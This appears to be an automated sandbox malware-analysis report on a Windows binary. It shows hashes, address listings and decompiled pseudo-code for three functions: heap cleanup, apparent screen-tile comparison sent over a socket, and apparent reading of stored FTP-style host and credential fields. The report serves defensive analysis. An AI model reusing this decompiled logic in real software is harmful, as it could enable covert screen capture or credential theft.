API ID: ObjectSingleWait$CloseHandleMutexThread$CreateCurrentPriorityRelease
String ID:
API String ID: 926561493-0
Opcode ID: 10f98dfb754679a2a43b14191f00f06da696a35ab807f35b08b76e741f72a0a7
Instruction ID: a0624e6b78377e5214d65748fef15d2b95d28fd278ca227f7f31204237c34ab6
Opcode Fuzzy Hash: 10f98dfb754679a2a43b14191f00f06da696a35ab807f35b08b76e741f72a0a7
Instruction Fuzzy Hash: 24F0C832750215A7C751E765BC49EEF377AABD8710B900A7FF101F21E4DA78E4428B68

Uniqueness

Uniqueness Score: -1.00%

Function 00425BD0, Relevance: 10.1, APIs: 8, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00425BD0(void* __eax) {
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t34;
				void* _t35;

				_t34 = __eax;
				_t10 =  *(__eax + 8);
				if(_t10 != 0) {
					HeapFree( *0x42e6d4, 0, _t10);
				}
				_t11 =  *(_t34 + 0x10);
				if(_t11 != 0) {
					HeapFree( *0x42e6d4, 0, _t11);
				}
				_t12 =  *(_t34 + 0x1c);
				if(_t12 != 0) {
					HeapFree( *0x42e6d4, 0, _t12);
				}
				_t13 =  *(_t34 + 0x2c);
				if(_t13 != 0) {
					HeapFree( *0x42e6d4, 0, _t13);
				}
				_t14 =  *(_t34 + 0x30);
				if(_t14 != 0) {
					HeapFree( *0x42e6d4, 0, _t14);
				}
				_t15 =  *(_t34 + 0x34);
				if(_t15 != 0) {
					HeapFree( *0x42e6d4, 0, _t15);
				}
				_t16 =  *(_t34 + 0x40);
				if(_t16 != 0) {
					_t16 = HeapFree( *0x42e6d4, 0, _t16);
				}
				_t35 =  *(_t34 + 0x44);
				if(_t35 != 0) {
					_t16 = HeapFree( *0x42e6d4, 0, _t35);
				}
				return _t16;
			}

0x00425bd1
0x00425bd3
0x00425bdf
0x00425bea
0x00425bea
0x00425bec
0x00425bf1
0x00425bfd
0x00425bfd
0x00425bff
0x00425c04
0x00425c10
0x00425c10
0x00425c12
0x00425c17
0x00425c22
0x00425c22
0x00425c24
0x00425c29
0x00425c35
0x00425c35
0x00425c37
0x00425c3c
0x00425c48
0x00425c48
0x00425c4a
0x00425c4f
0x00425c5a
0x00425c5a
0x00425c5c
0x00425c61
0x00425c6d
0x00425c6d
0x00425c71

APIs

HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425BEA
HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425BFD
HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C10
HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C22
HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C35
HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C48
HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C5A
HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C6D

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2c0d321d4c3c6ea58b7c2026c5f876af870996dd57d2dd1991837b9a465888dc
Instruction ID: e6b17622f593dc4016e9fe31ba1faa8f0e5c7b423b329e4bb56324b48d4ca245
Opcode Fuzzy Hash: 2c0d321d4c3c6ea58b7c2026c5f876af870996dd57d2dd1991837b9a465888dc
Instruction Fuzzy Hash: 5211A7713007146BD634EB6BED40F27B3ECABA4B40FD54529B601D7690D674FC018B68

Uniqueness

Uniqueness Score: -1.00%

Function 00405C70, Relevance: 9.3, APIs: 6, Instructions: 336
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00405C70(void* __eax) {
				void* __ebx;
				void* __esi;
				signed short _t120;
				signed short _t123;
				signed short _t124;
				signed int _t125;
				void* _t128;
				signed short _t134;
				signed int _t135;
				signed int _t140;
				void* _t142;
				void* _t145;
				void* _t146;
				long _t148;
				void* _t152;
				signed char _t154;
				intOrPtr* _t156;
				intOrPtr* _t158;
				intOrPtr* _t160;
				signed short _t164;
				signed short _t166;
				signed int _t167;
				signed int _t172;
				signed int _t174;
				signed short _t179;
				signed short _t180;
				signed int _t181;
				void* _t183;
				void* _t185;
				void* _t187;
				void* _t191;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t207;
				void* _t217;
				void* _t219;
				void* _t223;
				intOrPtr _t224;
				intOrPtr _t225;
				signed int _t226;
				signed int _t230;
				void* _t231;
				intOrPtr* _t232;
				void* _t233;
				signed int _t238;
				signed short _t239;
				void* _t242;
				void* _t245;
				void* _t246;
				void* _t247;

				_t224 =  *((intOrPtr*)(_t247 + 0x40));
				_t172 =  *(_t224 + 5) & 0x0000ffff;
				_t231 = __eax;
				if(_t172 == 0) {
					L76:
					return 0;
				} else {
					_t203 =  *(_t224 + 7) & 0x0000ffff;
					if(_t203 == 0) {
						goto L76;
					} else {
						 *(_t247 + 0x1c) = 0;
						 *(_t247 + 0x28) = 0;
						 *(_t247 + 0x30) = 0;
						_t120 =  *(_t224 + 1) & 0x0000ffff;
						_t204 =  *(_t224 + 3) + _t203 & 0x0000ffff;
						_t174 = _t172 + _t120 & 0x0000ffff;
						 *(_t247 + 0x38) = _t174;
						 *(_t247 + 0x34) = _t204;
						_t164 = _t120;
						while(1) {
							_t123 = _t174 - _t164 & 0x0000ffff;
							 *(_t247 + 0x24) = _t164;
							if(0x60 >= _t123) {
								_t124 = _t123 & 0x0000ffff;
								 *(_t247 + 0x1c) = _t124;
							} else {
								_t124 = 0x60;
								 *(_t247 + 0x1c) = 0x60;
							}
							if(_t164 >= _t174 || _t124 == 0) {
								break;
							}
							 *(_t247 + 0x28) = ( *(_t231 + 0x30) & 0x000000ff) * (_t124 & 0x0000ffff);
							_t134 =  *(_t224 + 3) & 0x0000ffff;
							 *(_t247 + 0x18) = _t134;
							while(1) {
								_t179 = _t204 - _t134 & 0x0000ffff;
								if(0x60 >= _t179) {
									_t180 = _t179 & 0x0000ffff;
									 *(_t247 + 0x14) = _t180;
								} else {
									_t180 = 0x60;
									 *(_t247 + 0x14) = 0x60;
								}
								if(_t134 >= _t204 || _t180 == 0) {
									break;
								}
								_t207 = _t134 & 0x0000ffff;
								_t135 =  *(_t231 + 8) & 0x0000ffff;
								_t226 = _t180 & 0x0000ffff;
								_t181 =  *(_t231 + 0x30) & 0x000000ff;
								_t23 = _t226 - 1; // -1
								_t238 = _t164 & 0x0000ffff;
								_t230 = ((_t207 + _t23) * _t135 + _t238) * _t181;
								_t167 = (_t135 * _t207 + _t238) * _t181;
								 *(_t247 + 0x30) = _t167;
								if( *((char*)( *((intOrPtr*)(_t247 + 0x48)))) == 0) {
									L42:
									_t140 = ( *(_t231 + 0x41) & 0x000000ff) * 0x2400;
									if( *((intOrPtr*)(_t231 + 0x4c)) == 5) {
										_t50 = _t140 + 0x31; // 0x31
										 *(_t247 + 0x10) =  *(_t247 + 0x10) + _t50;
									} else {
										 *(_t247 + 0x10) =  *(_t247 + 0x10) + _t140;
										 *0x42d3a8 = _t140;
									}
									_t239 =  *(_t247 + 0x2c);
									_t142 =  *(_t247 + 0x10) + _t239 + 0xc;
									if(_t142 != 0) {
										_t183 =  *(_t247 + 0x20);
										_push(_t142 + 4);
										if(_t183 != 0) {
											_t145 = HeapReAlloc( *0x42e6d4, 8, _t183, ??);
										} else {
											_t145 = HeapAlloc( *0x42e6d4, 8, ??);
										}
										if(_t145 != 0) {
											 *(_t247 + 0x20) = _t145;
											_t185 = _t145;
											goto L54;
										}
									} else {
										_t152 =  *(_t247 + 0x20);
										if(_t152 != 0) {
											HeapFree( *0x42e6d4, 0, _t152);
										}
										_t185 = 0;
										 *(_t247 + 0x20) = 0;
										L54:
										asm("rol dx, 0x8");
										 *((short*)(_t185 + _t239)) =  *(_t247 + 0x24) & 0x0000ffff;
										asm("rol dx, 0x8");
										 *((short*)(_t185 + _t239 + 2)) =  *(_t247 + 0x18) & 0x0000ffff;
										asm("rol dx, 0x8");
										 *((short*)(_t185 + _t239 + 4)) =  *(_t247 + 0x1c) & 0x0000ffff;
										asm("rol dx, 0x8");
										 *((short*)(_t185 + _t239 + 6)) =  *(_t247 + 0x14) & 0x0000ffff;
										 *((intOrPtr*)(_t185 + _t239 + 8)) =  *((intOrPtr*)(_t231 + 0x50));
										_t76 = _t239 + 0xc; // 0xc
										_t146 = _t185 + _t76;
										if( *((intOrPtr*)(_t231 + 0x4c)) == 5) {
											_t187 = ( *(_t231 + 0x41) & 0x000000ff) - 1;
											if(_t187 == 0) {
												_t148 = E00404F80( *(_t247 + 0x28) & 0x0000ffff, _t231, _t146,  *(_t247 + 0x2c) & 0x0000ffff,  *(_t247 + 0x20) & 0x0000ffff,  *(_t247 + 0x14) & 0x0000ffff);
												goto L63;
											} else {
												_t191 = _t187 - 1;
												if(_t191 == 0) {
													_t148 = E00405450( *(_t247 + 0x28) & 0x0000ffff, _t231, _t146,  *(_t247 + 0x2c) & 0x0000ffff,  *(_t247 + 0x20) & 0x0000ffff,  *(_t247 + 0x14) & 0x0000ffff);
													goto L63;
												} else {
													if(_t191 == 2) {
														_push( *(_t247 + 0x14) & 0x0000ffff);
														_push( *(_t247 + 0x20) & 0x0000ffff);
														_push( *(_t247 + 0x2c) & 0x0000ffff);
														_push(_t146);
														_push(_t231);
														_t148 = E00405940( *(_t247 + 0x28) & 0x0000ffff);
														goto L63;
													} else {
														 *(_t247 + 0x10) = 0;
													}
												}
											}
										} else {
											_t148 = E00405B80( *(_t247 + 0x30), _t231, _t146, _t167, _t230);
											_t239 =  *(_t247 + 0x2c);
											L63:
											 *(_t247 + 0x10) = _t148;
											if(_t148 != 0) {
												 *(_t247 + 0x34) =  *(_t247 + 0x34) + 1;
												 *(_t247 + 0x2c) = _t148 + _t239 + 0xc;
											}
										}
									}
								} else {
									_t154 =  *(_t231 + 0x30);
									if(_t154 != 1) {
										if(_t154 != 2) {
											if(_t154 == 4) {
												_t200 = _t167;
												if(_t167 <= _t230) {
													do {
														_t156 =  *((intOrPtr*)(_t231 + 0x18)) + _t200;
														_t217 =  *(_t247 + 0x28) + _t156;
														if(_t156 >= _t217) {
															goto L39;
														} else {
															_t242 =  *((intOrPtr*)(_t231 + 0x14)) - _t156 + _t200;
															while( *((intOrPtr*)(_t156 + _t242)) ==  *_t156) {
																_t156 = _t156 + 4;
																if(_t156 < _t217) {
																	continue;
																} else {
																	goto L39;
																}
																goto L65;
															}
															goto L41;
														}
														goto L65;
														L39:
														_t200 = _t200 +  *((intOrPtr*)(_t231 + 0xc));
													} while (_t200 <= _t230);
												}
											}
										} else {
											_t201 = _t167;
											if(_t167 <= _t230) {
												do {
													_t158 =  *((intOrPtr*)(_t231 + 0x18)) + _t201;
													_t219 =  *(_t247 + 0x28) + _t158;
													if(_t158 >= _t219) {
														goto L31;
													} else {
														_t245 =  *((intOrPtr*)(_t231 + 0x14)) - _t158 + _t201;
														while( *((intOrPtr*)(_t158 + _t245)) ==  *_t158) {
															_t158 = _t158 + 2;
															if(_t158 < _t219) {
																continue;
															} else {
																goto L31;
															}
															goto L65;
														}
														goto L41;
													}
													goto L65;
													L31:
													_t201 = _t201 +  *((intOrPtr*)(_t231 + 0xc));
												} while (_t201 <= _t230);
											}
										}
									} else {
										_t202 = _t167;
										if(_t167 <= _t230) {
											do {
												_t160 =  *((intOrPtr*)(_t231 + 0x18)) + _t202;
												_t246 = _t160 +  *(_t247 + 0x28);
												if(_t160 >= _t246) {
													goto L22;
												} else {
													_t223 =  *((intOrPtr*)(_t231 + 0x14)) - _t160 + _t202;
													while( *((intOrPtr*)(_t223 + _t160)) ==  *_t160) {
														_t160 = _t160 + 1;
														if(_t160 < _t246) {
															continue;
														} else {
															goto L22;
														}
														goto L65;
													}
													L41:
													_t167 =  *(_t247 + 0x30);
													goto L42;
												}
												goto L65;
												L22:
												_t202 = _t202 +  *((intOrPtr*)(_t231 + 0xc));
											} while (_t202 <= _t230);
										}
									}
								}
								L65:
								 *(_t247 + 0x18) =  *(_t247 + 0x18) +  *(_t247 + 0x14);
								_t224 =  *((intOrPtr*)(_t247 + 0x48));
								_t164 =  *(_t247 + 0x24);
								_t204 =  *(_t247 + 0x38);
								_t134 =  *(_t247 + 0x18);
							}
							_t164 =  *(_t247 + 0x1c) + _t164;
							_t174 =  *(_t247 + 0x3c);
						}
						_t125 =  *(_t247 + 0x34);
						if(_t125 != 0) {
							_t225 =  *((intOrPtr*)(_t247 + 0x40));
							_t232 = __imp__#19;
							asm("rol ax, 0x8");
							_push(0);
							 *(_t247 + 0x4a) = _t125;
							_push(4);
							_push(_t247 + 0x4c);
							_push(_t225);
							 *((short*)(_t247 + 0x54)) = 0;
							if( *_t232() != 4) {
								L72:
								_t233 = 0;
							} else {
								_t166 =  *(_t247 + 0x28);
								_push(0);
								_push(_t166);
								_push( *(_t247 + 0x1c));
								_push(_t225);
								if( *_t232() != _t166) {
									goto L72;
								} else {
									_t233 = 1;
								}
							}
						} else {
							_t233 = _t125 + 2;
						}
						_t128 =  *(_t247 + 0x1c);
						if(_t128 != 0) {
							HeapFree( *0x42e6d4, 0, _t128);
						}
						return _t233;
					}
				}
			}

0x00405c75
0x00405c79
0x00405c7d
0x00405c84
0x00406076
0x0040607c
0x00405c8a
0x00405c8a
0x00405c91
0x00000000
0x00405c97
0x00405c9c
0x00405ca0
0x00405ca4
0x00405ca8
0x00405cb1
0x00405cb4
0x00405cb7
0x00405cbb
0x00405cbf
0x00405cc2
0x00405cc6
0x00405cce
0x00405cd5
0x00405cdf
0x00405ce2
0x00405cd7
0x00405cd7
0x00405cd9
0x00405cd9
0x00405ce9
0x00000000
0x00000000
0x00405d02
0x00405d06
0x00405d0a
0x00405d10
0x00405d14
0x00405d1f
0x00405d29
0x00405d2c
0x00405d21
0x00405d21
0x00405d23
0x00405d23
0x00405d33
0x00000000
0x00000000
0x00405d42
0x00405d45
0x00405d49
0x00405d4c
0x00405d50
0x00405d5e
0x00405d68
0x00405d6e
0x00405d70
0x00405d74
0x00405e5e
0x00405e62
0x00405e6c
0x00405e7d
0x00405e81
0x00405e6e
0x00405e6e
0x00405e72
0x00405e72
0x00405e85
0x00405e8d
0x00405e93
0x00405eb5
0x00405ebc
0x00405ebf
0x00405edb
0x00405ec1
0x00405eca
0x00405eca
0x00405ee3
0x00405ee9
0x00405eed
0x00000000
0x00405eed
0x00405e95
0x00405e95
0x00405e9b
0x00405ea7
0x00405ea7
0x00405ead
0x00405eaf
0x00405eef
0x00405ef4
0x00405ef8
0x00405f01
0x00405f05
0x00405f0f
0x00405f13
0x00405f1d
0x00405f21
0x00405f29
0x00405f31
0x00405f31
0x00405f35
0x00405f4d
0x00405f4e
0x00405fbb
0x00000000
0x00405f50
0x00405f50
0x00405f51
0x00405f9b
0x00000000
0x00405f53
0x00405f56
0x00405f67
0x00405f6d
0x00405f73
0x00405f74
0x00405f7a
0x00405f7b
0x00000000
0x00405f58
0x00405f58
0x00405f58
0x00405f56
0x00405f51
0x00405f37
0x00405f3e
0x00405f43
0x00405fc0
0x00405fc0
0x00405fc6
0x00405fc8
0x00405fd0
0x00405fd0
0x00405fc6
0x00405f35
0x00405d7a
0x00405d7a
0x00405d7f
0x00405dce
0x00405e14
0x00405e1a
0x00405e1e
0x00405e24
0x00405e2b
0x00405e2d
0x00405e31
0x00000000
0x00405e33
0x00405e38
0x00405e40
0x00405e47
0x00405e4c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e4c
0x00000000
0x00405e40
0x00000000
0x00405e4e
0x00405e4e
0x00405e51
0x00405e55
0x00405e1e
0x00405dd0
0x00405dd0
0x00405dd4
0x00405de0
0x00405de7
0x00405de9
0x00405ded
0x00000000
0x00405def
0x00405df4
0x00405df6
0x00405dff
0x00405e04
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e04
0x00000000
0x00405df6
0x00000000
0x00405e06
0x00405e06
0x00405e09
0x00405e0d
0x00405dd4
0x00405d81
0x00405d81
0x00405d85
0x00405d90
0x00405d97
0x00405d99
0x00405d9e
0x00000000
0x00405da0
0x00405da5
0x00405db0
0x00405dbb
0x00405dbe
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405dbe
0x00405e5a
0x00405e5a
0x00000000
0x00405e5a
0x00000000
0x00405dc0
0x00405dc0
0x00405dc3
0x00405dc7
0x00405d85
0x00405d7f
0x00405fd4
0x00405fd8
0x00405fdc
0x00405fe0
0x00405fe4
0x00405fe8
0x00405fe8
0x00405ff1
0x00405ff5
0x00405ff5
0x00405ffe
0x00406005
0x0040600c
0x00406010
0x00406018
0x0040601c
0x0040601d
0x00406022
0x00406028
0x00406029
0x0040602a
0x00406034
0x00406050
0x00406050
0x00406036
0x00406036
0x0040603e
0x00406040
0x00406041
0x00406042
0x00406047
0x00000000
0x00406049
0x00406049
0x00406049
0x00406047
0x00406007
0x00406007
0x00406007
0x00406052
0x00406059
0x00406065
0x00406065
0x00406072
0x00406072
0x00405c91

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f5ed995b6b723d83656e06134eea33f82e3a7ccc9f9d90712bdfa26851b22e8
Instruction ID: 66484bf6d23b6d4cf3c54adffe178f92e2968ca64fefd948f0860bbd454ff9da
Opcode Fuzzy Hash: 0f5ed995b6b723d83656e06134eea33f82e3a7ccc9f9d90712bdfa26851b22e8
Instruction Fuzzy Hash: 5FC17C706087129BC724DF25C880A3BB7E5EF98704F54493EF4C6AB291E63CD945CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00422D30, Relevance: 9.3, APIs: 6, Instructions: 270
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00422D30(WCHAR* __ecx, signed char* __edx) {
				intOrPtr _v4;
				intOrPtr _v68;
				short _v520;
				char _v528;
				char _v612;
				char _v632;
				char _v636;
				char _v648;
				signed int _v656;
				char _v660;
				char _v668;
				char _v672;
				char _v676;
				signed int _v680;
				char _v684;
				char _v688;
				intOrPtr* _v692;
				char _v696;
				signed int _v700;
				intOrPtr* _v704;
				signed int _v708;
				signed int _v716;
				char _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int _v736;
				void* __ebx;
				void* __esi;
				WCHAR* _t68;
				signed int _t70;
				signed int _t74;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				signed int _t86;
				intOrPtr* _t88;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				intOrPtr* _t96;
				signed int _t98;
				signed int _t99;
				signed int _t105;
				signed int _t108;
				signed int _t112;
				signed int _t127;
				signed int _t128;
				intOrPtr _t129;
				WCHAR* _t130;
				signed int _t149;
				void* _t150;
				signed short* _t156;
				signed int _t168;
				signed int _t169;
				intOrPtr* _t170;
				void* _t171;
				signed int _t173;
				signed char* _t174;
				signed short* _t175;
				signed int _t176;
				char* _t177;
				char* _t178;
				char* _t179;
				char* _t180;
				intOrPtr _t183;
				signed int _t184;

				_t130 = __ecx;
				_t174 = __edx;
				_t68 = __edx + 0x2c;
				if(_t68 != 0) {
					L1:
					_t168 =  *_t68 & 0x0000ffff;
					if(_t168 == 0x5c || _t168 == 0x2f) {
						_t68 =  &(_t68[1]);
						goto L1;
					}
				}
				_t70 = PathCombineW( &_v520, _t130, _t68);
				__eflags = _t70;
				if(_t70 == 0) {
					L61:
					return 1;
				} else {
					__eflags =  *_t174 & 0x00000010;
					if(( *_t174 & 0x00000010) == 0) {
						_push( &_v528);
						_t127 = E00419940();
						_v656 = _t127;
						__eflags = _t127;
						if(_t127 != 0) {
							_t74 =  *((intOrPtr*)( *((intOrPtr*)( *_t127 + 0xb4))))(_t127,  &_v676);
							__eflags = _t74;
							if(_t74 == 0) {
								_t77 = _v684;
								_t78 =  *((intOrPtr*)( *((intOrPtr*)( *_t77 + 0x1c))))(_t77,  &_v672);
								__eflags = _t78;
								if(_t78 == 0) {
									_t175 =  &_v612;
									E00424100(0x9e, _t175);
									_t156 = _t175;
									_t176 = _v680;
									__eflags = _t176;
									if(_t176 != 0) {
										_t82 = 0;
										__eflags =  *_t176;
										if( *_t176 == 0) {
											L19:
											_t83 = _t82 + 0xfffffff4;
											__eflags = _t83;
											if(_t83 == 0) {
												goto L21;
											} else {
												goto L20;
											}
										} else {
											do {
												_t82 = _t82 + 1;
												__eflags =  *((short*)(_t176 + _t82 * 2));
											} while ( *((short*)(_t176 + _t82 * 2)) != 0);
											__eflags = _t82 - 0xc;
											if(_t82 != 0xc) {
												goto L19;
											} else {
												_t150 = 0;
												_t173 = _t176 -  &_v612;
												__eflags = _t173;
												while(1) {
													_t83 = ( *(_t156 + _t173) & 0x0000ffff) - ( *_t156 & 0x0000ffff);
													__eflags = _t83;
													if(_t83 != 0) {
														break;
													}
													_t150 = _t150 + 1;
													_t156 =  &(_t156[1]);
													__eflags = _t150 - 0xc;
													if(_t150 < 0xc) {
														continue;
													} else {
														L21:
														_t177 =  &_v636;
														E00424100(0x9f, _t177);
														_t85 = _v692;
														_t86 =  *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x94))))(_t85, _t177,  &_v656);
														__eflags = _t86;
														if(_t86 != 0) {
															_v700 = 0;
															_t169 = _v700;
														} else {
															_t169 = E004199F0( &_v668);
															_v700 = _t169;
														}
														_t178 =  &_v660;
														E00424100(0xa0, _t178);
														_t88 = _v704;
														_t90 =  *((intOrPtr*)( *((intOrPtr*)( *_t88 + 0x94))))(_t88, _t178,  &_v676);
														__eflags = _t90;
														if(_t90 != 0) {
															_v708 = 0;
														} else {
															_v708 = E004199F0( &_v688);
														}
														_t179 =  &_v648;
														E00424100(0xa1, _t179);
														_t92 = _v716;
														_t94 =  *((intOrPtr*)( *((intOrPtr*)( *_t92 + 0x94))))(_t92, _t179,  &_v684);
														__eflags = _t94;
														if(_t94 != 0) {
															_t184 = 0;
															__eflags = 0;
														} else {
															_t184 = E004199F0( &_v696);
														}
														_t180 =  &_v648;
														E00424100(0xa2, _t180);
														_t96 = _v728;
														_t164 = _t180;
														_t98 =  *((intOrPtr*)( *((intOrPtr*)( *_t96 + 0x94))))(_t96, _t180,  &_v688);
														__eflags = _t98;
														if(_t98 != 0) {
															_v724 = 0;
															_t128 = _v724;
														} else {
															_t128 = E004199F0( &_v700);
															_v724 = _t128;
														}
														__eflags = _t169;
														if(_t169 == 0) {
															_t170 = __imp__#6;
														} else {
															__eflags =  *_t169;
															if( *_t169 != 0) {
																__eflags = _t184;
																if(_t184 != 0) {
																	__eflags =  *_t184;
																	if( *_t184 != 0) {
																		__eflags = _t128;
																		if(_t128 != 0) {
																			_t105 = E00422A10(_t164, _t128);
																			__eflags = _t105;
																			if(_t105 > 0) {
																				_t165 = _v732;
																				__eflags = _v732;
																				if(_v732 == 0) {
																					L42:
																					_t171 = 0x15;
																				} else {
																					_t171 = E00411140(_t165);
																					__eflags = _t171 - 1;
																					if(_t171 < 1) {
																						goto L42;
																					} else {
																						__eflags = _t171 - 0xffff;
																						if(_t171 > 0xffff) {
																							goto L42;
																						}
																					}
																				}
																				_v720 = 0;
																				E00424100(0x55,  &_v632);
																				_push(_t171);
																				_push(_v736);
																				_push(_t128);
																				_t108 = E00411DC0(__eflags,  &_v720,  &_v632, _t184);
																				_t129 = _v720;
																				__eflags = _t108;
																				if(_t108 > 0) {
																					_t183 = _v68;
																					_t112 = E00410D70(_t183, _t129, _t108);
																					__eflags = _t112;
																					if(_t112 != 0) {
																						_t58 = _t183 + 4;
																						 *_t58 =  *(_t183 + 4) + 1;
																						__eflags =  *_t58;
																					}
																				}
																				E004107C0(_t129);
																				_t128 = _v724;
																				_t169 = _v736;
																			}
																		}
																	}
																}
															}
															_t170 = __imp__#6;
															 *_t170(_t169);
														}
														_t99 = _v732;
														__eflags = _t99;
														if(_t99 != 0) {
															 *_t170(_t99);
														}
														__eflags = _t184;
														if(_t184 != 0) {
															 *_t170(_t184);
														}
														__eflags = _t128;
														if(_t128 != 0) {
															 *_t170(_t128);
														}
														_t176 = _v728;
														_t127 = _v716;
													}
													goto L57;
												}
												L20:
												__eflags = _t83;
												_t149 = 0 | _t83 > 0x00000000;
												_t22 = _t149 - 1; // -1
												__eflags = _t149 + _t22;
												if(_t149 + _t22 != 0) {
													_t170 = __imp__#6;
												} else {
													goto L21;
												}
											}
										}
										L57:
										__eflags = _t176;
										if(_t176 != 0) {
											 *_t170(_t176);
										}
									}
								}
								_t79 = _v692;
								 *((intOrPtr*)( *((intOrPtr*)( *_t79 + 8))))(_t79);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *_t127 + 8))))(_t127);
						}
						goto L61;
					} else {
						E00422CE0( &_v528, _v4);
						return 1;
					}
				}
			}

0x00422d30
0x00422d39
0x00422d3b
0x00422d41
0x00422d43
0x00422d43
0x00422d49
0x00422d50
0x00000000
0x00422d50
0x00422d49
0x00422d5f
0x00422d65
0x00422d67
0x00423058
0x00423061
0x00422d6d
0x00422d6d
0x00422d77
0x00422d94
0x00422d9a
0x00422d9c
0x00422da0
0x00422da2
0x00422db6
0x00422db8
0x00422dba
0x00422dc0
0x00422dcf
0x00422dd1
0x00422dd3
0x00422dd9
0x00422de2
0x00422de7
0x00422de9
0x00422ded
0x00422def
0x00422df5
0x00422df7
0x00422dfa
0x00422e2d
0x00422e2d
0x00422e2d
0x00422e30
0x00000000
0x00000000
0x00000000
0x00000000
0x00422e00
0x00422e00
0x00422e00
0x00422e01
0x00422e01
0x00422e08
0x00422e0b
0x00000000
0x00422e0d
0x00422e13
0x00422e15
0x00422e15
0x00422e17
0x00422e1e
0x00422e1e
0x00422e20
0x00000000
0x00000000
0x00422e22
0x00422e23
0x00422e26
0x00422e29
0x00000000
0x00422e2b
0x00422e45
0x00422e45
0x00422e4e
0x00422e53
0x00422e68
0x00422e6a
0x00422e6c
0x00422e7f
0x00422e87
0x00422e6e
0x00422e77
0x00422e79
0x00422e79
0x00422e8b
0x00422e94
0x00422e99
0x00422eae
0x00422eb0
0x00422eb2
0x00422ec3
0x00422eb4
0x00422ebd
0x00422ebd
0x00422ecb
0x00422ed4
0x00422ed9
0x00422eee
0x00422ef0
0x00422ef2
0x00422f01
0x00422f01
0x00422ef4
0x00422efd
0x00422efd
0x00422f03
0x00422f0c
0x00422f11
0x00422f1c
0x00422f26
0x00422f28
0x00422f2a
0x00422f3d
0x00422f45
0x00422f2c
0x00422f35
0x00422f37
0x00422f37
0x00422f49
0x00422f4b
0x0042300b
0x00422f51
0x00422f51
0x00422f55
0x00422f5b
0x00422f5d
0x00422f63
0x00422f68
0x00422f6e
0x00422f70
0x00422f78
0x00422f7d
0x00422f7f
0x00422f81
0x00422f85
0x00422f87
0x00422f9d
0x00422f9d
0x00422f89
0x00422f8e
0x00422f90
0x00422f93
0x00000000
0x00422f95
0x00422f95
0x00422f9b
0x00000000
0x00000000
0x00422f9b
0x00422f93
0x00422fae
0x00422fb6
0x00422fbf
0x00422fc0
0x00422fc1
0x00422fcb
0x00422fd0
0x00422fd7
0x00422fd9
0x00422fdb
0x00422fe5
0x00422fea
0x00422fec
0x00422fee
0x00422fee
0x00422fee
0x00422fee
0x00422fec
0x00422ff3
0x00422ff8
0x00422ffc
0x00422ffc
0x00422f7f
0x00422f70
0x00422f68
0x00422f5d
0x00423001
0x00423007
0x00423007
0x00423011
0x00423015
0x00423017
0x0042301a
0x0042301a
0x0042301c
0x0042301e
0x00423021
0x00423021
0x00423023
0x00423025
0x00423028
0x00423028
0x0042302a
0x0042302e
0x0042302e
0x00000000
0x00422e29
0x00422e32
0x00422e34
0x00422e36
0x00422e39
0x00422e3d
0x00422e3f
0x00423034
0x00000000
0x00000000
0x00000000
0x00422e3f
0x00422e0b
0x0042303a
0x0042303a
0x0042303c
0x0042303f
0x0042303f
0x0042303c
0x00422def
0x00423041
0x0042304b
0x0042304b
0x00423053
0x00423053
0x00000000
0x00422d79
0x00422d80
0x00422d91
0x00422d91
0x00422d77

APIs

PathCombineW.SHLWAPI(?,?,?), ref: 00422D5F
SysFreeString.OLEAUT32(00000000), ref: 00423007
SysFreeString.OLEAUT32(00000000), ref: 0042301A
SysFreeString.OLEAUT32(00000000), ref: 00423021
SysFreeString.OLEAUT32(00000000), ref: 00423028
SysFreeString.OLEAUT32(?), ref: 0042303F

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$CombinePath
String ID:
API String ID: 16530377-0
Opcode ID: dbf2c3aeb27526b962e5394d52e690c3c669cebb66b287d3d29cb1e44e7614d4
